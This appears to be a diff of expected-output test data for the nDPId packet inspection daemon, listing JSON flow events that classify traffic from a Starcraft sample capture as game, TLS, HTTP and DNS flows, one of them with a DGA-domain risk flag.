+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389964752,"flow_last_seen":1437389964835,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": 
{"confidence": {"2":"Match by IP"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
